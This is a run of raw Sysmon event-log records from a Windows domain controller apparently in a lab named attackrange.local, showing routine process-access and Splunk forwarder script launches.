15:51:20.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002207Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C78-5FA1-6500-000000008801}3920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002206Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C78-5FA1-6500-000000008801}3920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002205Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.927{D28789B6-7C78-5FA1-6500-000000008801}3920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002204Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C78-5FA1-6400-000000008801}2752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002203Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002202Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002201Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002200Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002199Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002198Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002197Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002196Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002195Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002194Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C78-5FA1-6400-000000008801}2752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002193Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.816{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C78-5FA1-6400-000000008801}2752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002192Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.818{D28789B6-7C78-5FA1-6400-000000008801}2752C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C78-5FA1-6300-000000008801}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002190Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002189Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002188Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002187Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002186Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002185Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002184Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002183Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002182Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 